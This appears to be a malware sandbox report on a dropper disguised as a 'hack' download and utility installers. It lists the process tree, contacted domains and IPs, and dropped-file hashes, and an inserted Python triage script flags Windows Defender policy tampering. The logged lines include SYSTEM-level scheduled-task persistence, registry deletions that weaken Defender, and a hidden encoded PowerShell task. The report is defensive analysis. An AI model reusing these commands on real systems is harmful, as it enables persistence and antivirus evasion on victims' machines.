schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 15:23:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe\" qz /site_id 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "YESfVrKgbFKcjSeIN"
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe qz /site_id 757674 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\zfRebA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iwOiVBtjWoVYUMW2" /F /xml "C:\Program Files (x86)\XxxUzwYQU\GnbMyEB.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iwOiVBtjWoVYUMW"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iwOiVBtjWoVYUMW"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "inkTbLvZLQETKy" /F /xml "C:\Program Files (x86)\WyuevociGfNU2\LzOYMrW.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OyBqrIWqLdeiE2" /F /xml "C:\ProgramData\FZMYpcBymcbXiuVB\WUpZOtb.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PlZzFkPIrCHUSjSZK2" /F /xml "C:\Program Files (x86)\OdCkbftzuRPDCLooswR\dsKYSUK.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qLTAOMlkEgsXQBsYXgt2" /F /xml "C:\Program Files (x86)\unWhUoTpcLxwC\CqRtzkA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YQwpFizkoQMsJvRhq" /SC once /ST 04:38:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll\",#1 /site_id 757674" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 880 -p 1800 -ip 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "YQwpFizkoQMsJvRhq"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2508
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HsdHtTcNAoJBjrVs\hUqFzISs\hqhbwEs.dll",#1 /site_id 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 872 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2196
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YQwpFizkoQMsJvRhq"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1800 -ip 1800
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 2224
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YESfVrKgbFKcjSeIN"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 1800 -ip 1800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 140
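Added triage example, not part of this sandbox report or of the sample's own code. The process tree above records a Defender policy-tampering sequence: ThreatIDDefaultAction is set to 6 (the Allow action in Microsoft's Set-MpPreference documentation) for a list of threat IDs under both the 32-bit and 64-bit registry views, every drop directory is added as a policy path exclusion, SpyNetReporting is deleted, and a one-shot scheduled task runs PowerShell whose -EncodedCommand decodes (base64 of UTF-16LE) to start-process -WindowStyle Hidden gpupdate.exe /force. The script below walks process command lines, unwraps the cmd /C and powershell wrappers, decodes the encoded command, classifies each REG operation against the Defender policy root and returns the harvested exclusion paths and allowed threat IDs. SAMPLE_COMMANDS is a constructed sample copied from the tree above, with the long powershell wrapper trimmed to two of its REG ADD operations; the function names and severity labels are my own choices.

```python
import base64
import re

# Policy root that Defender reads its Group Policy settings from; every registry
# change in the process tree above lands beneath this key.
DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"

# ThreatIDDefaultAction data values, per Microsoft's Set-MpPreference documentation.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

# Constructed sample: command lines copied from the process tree on this page
# (the powershell wrapper is trimmed to two of its REG ADD operations).
SAMPLE_COMMANDS = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64',
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NxGlAgQUfzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HsdHtTcNAoJBjrVs\" /t REG_DWORD /d 0 /reg:64;"',
    r'"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32',
    r'schtasks /CREATE /TN "gnMtnfgYj" /SC once /ST 02:48:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64',
]

def tokenize(cmd):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]

def decode_encoded_command(cmd):
    """Plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    return None if m is None else base64.b64decode(m.group(1)).decode("utf-16-le")

def expand(cmd):
    """Yield the REG operations inside 'powershell "cmd /C a;b;..."' and 'cmd /C ...' wrappers."""
    inner = cmd
    m = re.match(r'\s*powershell(?:\.exe)?\s+"(.*)"\s*$', cmd, re.I | re.S)
    if m:
        inner = m.group(1).replace('\\"', '"')  # undo the \" escaping of the inner quotes
    inner = re.sub(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/C\s+', "", inner, flags=re.I)
    for part in inner.split(";"):
        if part.strip():
            yield part.strip()

def parse_reg(op_line):
    """Parse 'REG ADD|DELETE <key> [/v name] [/t type] [/d data] [/f] [/reg:32|64]'."""
    toks = tokenize(op_line)
    start = next((i for i, t in enumerate(toks) if t.upper() == "REG" or t.lower().endswith("reg.exe")), None)
    if start is None or len(toks) < start + 3 or toks[start + 1].upper() not in ("ADD", "DELETE"):
        return None
    rec = {"op": toks[start + 1].upper(), "key": toks[start + 2], "value": None, "data": None, "view": None}
    rest = toks[start + 3:]
    for i, t in enumerate(rest):
        if t.lower() == "/v" and i + 1 < len(rest):
            rec["value"] = rest[i + 1]
        elif t.lower() == "/d" and i + 1 < len(rest):
            rec["data"] = rest[i + 1]
        elif t.lower().startswith("/reg:"):
            rec["view"] = t[5:]
    return rec

def policy_subkey(key):
    """Subkey below the Defender policy root, lower-cased, or None when the key is elsewhere."""
    k = key.lower()
    return k[len(DEFENDER_POLICY):].strip("\\") if k.startswith(DEFENDER_POLICY) else None

def triage(command_lines):
    """Run the checks over process command lines; returns findings plus the harvested IOCs."""
    findings, excluded, allowed, decoded_cmds = [], set(), set(), []
    for cmd in command_lines:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            decoded_cmds.append(decoded)
            findings.append(("medium", "encoded PowerShell decodes to: " + decoded))
            continue
        for part in expand(cmd):
            rec = parse_reg(part)
            sub = policy_subkey(rec["key"]) if rec else None
            if sub is None:
                continue
            view = rec["view"] or "native"
            if rec["op"] == "ADD" and sub == r"threats\threatiddefaultaction":
                action = THREAT_ACTIONS.get(rec["data"], "unknown")
                sev = "high" if action in ("Allow", "NoAction") else "medium"
                findings.append((sev, f"threat ID {rec['value']} default action set to {action} (view {view})"))
                if action == "Allow":
                    allowed.add(rec["value"])
            elif rec["op"] == "ADD" and sub == r"exclusions\paths":
                findings.append(("high", f"path excluded from scanning: {rec['value']} (view {view})"))
                excluded.add(rec["value"])
            elif rec["op"] == "DELETE" and sub == "spynet":
                findings.append(("medium", f"cloud-protection policy value removed: {rec['value']} (view {view})"))
            else:
                findings.append(("low", f"{rec['op']} on Defender policy {sub}\\{rec['value']} (view {view})"))
    return {"findings": findings, "excluded_paths": sorted(excluded),
            "allowed_threat_ids": sorted(allowed), "decoded_commands": decoded_cmds}

if __name__ == "__main__":
    for severity, text in triage(SAMPLE_COMMANDS)["findings"]:
        print(f"[{severity:>6}] {text}")
```

Feed it process-creation telemetry (Sysmon event 1 or Security 4688 command lines) one command per entry. Anything written under the Defender policy root by reg.exe rather than by Group Policy processing deserves a look on its own, and the exclusion paths it returns double as hunting paths for the dropped payloads, since the sample excludes exactly the directories it stages its components in.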
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 13.89.178.27:443 | | tcp |
| N/A | 8.8.8.8:53 | mainiwelminobhei.ml | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | setupservice.xyz | udp |
| N/A | 188.114.97.0:443 | setupservice.xyz | tcp |
| N/A | 104.80.225.205:443 | | tcp |
| N/A | 8.249.91.254:80 | | tcp |
| N/A | 8.249.91.254:80 | | tcp |
| N/A | 8.249.91.254:80 | | tcp |
| N/A | 93.184.221.240:80 | | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | superload.info | udp |
| N/A | 91.202.5.58:80 | superload.info | tcp |
| N/A | 8.8.8.8:53 | static-surf.site | udp |
| N/A | 104.21.10.204:80 | static-surf.site | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | my-usa.info | udp |
| N/A | 91.202.5.58:80 | my-usa.info | tcp |
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 95.163.241.63:80 | 95.163.241.63 | tcp |
| N/A | 8.8.8.8:53 | ilonamaska.info | udp |
| N/A | 91.202.5.58:80 | ilonamaska.info | tcp |
| N/A | 85.208.136.33:80 | 85.208.136.33 | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | n63b16.info | udp |
| N/A | 46.23.109.153:81 | n63b16.info | tcp |
| N/A | 8.8.8.8:53 | downwingbuttons.site | udp |
| N/A | 185.117.88.231:80 | downwingbuttons.site | tcp |
| N/A | 85.208.136.148:80 | 85.208.136.148 | tcp |
| N/A | 8.8.8.8:53 | staticcontentfiles.info | udp |
| N/A | 185.117.88.231:57120 | staticcontentfiles.info | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 185.117.88.231:57120 | staticcontentfiles.info | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | z0dfnakw4qndvgzp3frm4oa5unhcka.lqbriyvuu2wylnkx4 | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | mainiwelminobhei.ml | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 88.119.175.57:80 | | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | service-domain.xyz | udp |
| N/A | 3.80.150.121:443 | service-domain.xyz | tcp |
| N/A | 8.8.8.8:53 | mainiwelminobhei.ml | udp |
| N/A | 172.67.187.207:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | api5.check-data.xyz | udp |
| N/A | 54.191.228.37:80 | api5.check-data.xyz | tcp |
Files
memory/4864-132-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4864-134-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
| MD5 | f37fc9007d7cac6c71bfc69921887808 |
| SHA1 | ca60cb48048e3bd66919205fadf3be9b54b0ddfd |
| SHA256 | f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53 |
| SHA512 | 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9 |
memory/1656-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
| MD5 | f37fc9007d7cac6c71bfc69921887808 |
| SHA1 | ca60cb48048e3bd66919205fadf3be9b54b0ddfd |
| SHA256 | f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53 |
| SHA512 | 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9 |
C:\Users\Admin\AppData\Local\Temp\is-QN7NH.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/1616-139-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/1616-141-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1616-142-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1616-143-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1616-144-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1668-145-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/1800-146-0x0000000000000000-mapping.dmp
memory/1800-149-0x0000000000400000-0x000000000158E000-memory.dmp
memory/4864-150-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1800-151-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1800-152-0x0000000000400000-0x000000000158E000-memory.dmp
memory/4056-153-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
| MD5 | 520b5aedc6da20023cfae3ff6b6998c3 |
| SHA1 | 6c40cb2643acc1155937e48a5bdfc41d7309d629 |
| SHA256 | 21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070 |
| SHA512 | 714dedbb46f16ec64eb0883462635cfa8cbb870b8bc05a419ebe272f82997f71e9bdb1adcdedd62fda7a1032cffca2b8ec93d2fdf4b5f3fa8dedbe7274372c6d |
memory/4056-155-0x0000000000A80000-0x0000000000F15000-memory.dmp
memory/4056-156-0x0000000000070000-0x0000000000073000-memory.dmp
C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
| MD5 | 520b5aedc6da20023cfae3ff6b6998c3 |
| SHA1 | 6c40cb2643acc1155937e48a5bdfc41d7309d629 |
| SHA256 | 21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070 |
| SHA512 | 714dedbb46f16ec64eb0883462635cfa8cbb870b8bc05a419ebe272f82997f71e9bdb1adcdedd62fda7a1032cffca2b8ec93d2fdf4b5f3fa8dedbe7274372c6d |
memory/4056-158-0x0000000000070000-0x0000000000073000-memory.dmp
memory/2340-160-0x0000000000000000-mapping.dmp
memory/1588-159-0x0000000000000000-mapping.dmp
memory/2340-163-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
| MD5 | c6f806e7f38f2f55f6b2e2d31b53564b |
| SHA1 | 02c96f6212a5f414199a503bfb3bb9010f2346a5 |
| SHA256 | e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7 |
| SHA512 | 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f |
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
| MD5 | cc21c45d87dc08784bdcd3c46ffdd400 |
| SHA1 | d63e755519c8cb45f84032a95bc77f91a39bc2c3 |
| SHA256 | 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb |
| SHA512 | f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced |
C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
| MD5 | cc21c45d87dc08784bdcd3c46ffdd400 |
| SHA1 | d63e755519c8cb45f84032a95bc77f91a39bc2c3 |
| SHA256 | 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb |
| SHA512 | f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced |
C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
| MD5 | e3dcae5ee7ee62e603d2a37128861468 |
| SHA1 | c68f71703f544ec31d1670c09a597c06c827fb46 |
| SHA256 | b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d |
| SHA512 | f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c |
memory/4100-167-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
| MD5 | c6f806e7f38f2f55f6b2e2d31b53564b |
| SHA1 | 02c96f6212a5f414199a503bfb3bb9010f2346a5 |
| SHA256 | e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7 |
| SHA512 | 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f |
C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
| MD5 | e3dcae5ee7ee62e603d2a37128861468 |
| SHA1 | c68f71703f544ec31d1670c09a597c06c827fb46 |
| SHA256 | b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d |
| SHA512 | f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c |
memory/2340-170-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H7E88.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Program Files (x86)\Reg Organizer\TurboSearch.exe
| MD5 | 4bf63923ee6f1f20b848371e51f44a7c |
| SHA1 | 1c8243554533882b9539c47e9f4a8c72183fe689 |
| SHA256 | aa69860c73e0be7add6f4f9945ad3b43e09ed000e8cf1153bd415a880806ddbb |
| SHA512 | 92859304a0f91cc9fb2ffdaba0a75f27736d84314d112466d290b6635e6e63d0f6348aaea6c944cdd2bafd16aadf9bfceb5e7496e1688544c8bf4f71cd8259ab |
memory/1200-173-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
| MD5 | 879c2312a3f8e7a4f866eb9c68a5c5be |
| SHA1 | 763c4907534823d898458ceb1064cfda93b3a242 |
| SHA256 | 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0 |
| SHA512 | 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b |
memory/1200-175-0x0000000000400000-0x00000000011BD000-memory.dmp
memory/5108-176-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
| MD5 | 262bacb5f63eb9daf62c1c4ab2a20318 |
| SHA1 | bf196ed1fd658c32b4152c7f8b3f6af5af748a03 |
| SHA256 | 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8 |
| SHA512 | 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8 |
memory/1200-177-0x0000000000400000-0x00000000011BD000-memory.dmp
C:\Program Files (x86)\Any Drive Formatter\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
C:\Program Files (x86)\Any Drive Formatter\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
memory/5108-183-0x0000000000400000-0x0000000001518000-memory.dmp
memory/5108-181-0x0000000000400000-0x0000000001518000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
| MD5 | 66946d193bc7c3e2180fb4546af216bd |
| SHA1 | e149d444d52bfca9443d11fea9d9a7a0b74c2fbd |
| SHA256 | 504f9c87626b6f90d54a992104c11745dcb1846369f60cff9562a2ba39984703 |
| SHA512 | 27c13cba48fd2f5f2c8dcabb5c9abaf9c56a35cf51efccc832f2c8366030c7410456965ce33d0f63e987b1a4127ae5156235d13da47f80d790d8698990562f24 |
C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
| MD5 | 66946d193bc7c3e2180fb4546af216bd |
| SHA1 | e149d444d52bfca9443d11fea9d9a7a0b74c2fbd |
| SHA256 | 504f9c87626b6f90d54a992104c11745dcb1846369f60cff9562a2ba39984703 |
| SHA512 | 27c13cba48fd2f5f2c8dcabb5c9abaf9c56a35cf51efccc832f2c8366030c7410456965ce33d0f63e987b1a4127ae5156235d13da47f80d790d8698990562f24 |
memory/1200-186-0x0000000000400000-0x00000000011BD000-memory.dmp
memory/1116-182-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
| MD5 | 262bacb5f63eb9daf62c1c4ab2a20318 |
| SHA1 | bf196ed1fd658c32b4152c7f8b3f6af5af748a03 |
| SHA256 | 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8 |
| SHA512 | 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8 |
memory/5108-189-0x0000000000400000-0x0000000001518000-memory.dmp
memory/5108-188-0x0000000000400000-0x0000000001518000-memory.dmp
memory/2340-190-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1116-191-0x0000000000D00000-0x0000000000D64000-memory.dmp
memory/1116-192-0x0000000005BA0000-0x00000000061B8000-memory.dmp
memory/1116-193-0x00000000055B0000-0x00000000055C2000-memory.dmp
memory/1116-194-0x00000000056E0000-0x00000000057EA000-memory.dmp
memory/4296-195-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
| MD5 | 16ad463bc69dc5e2580ddc855b9f10b0 |
| SHA1 | 2639d11cece15244c647964f3b515cc7b3d429f0 |
| SHA256 | a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e |
| SHA512 | d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e |
memory/4296-199-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
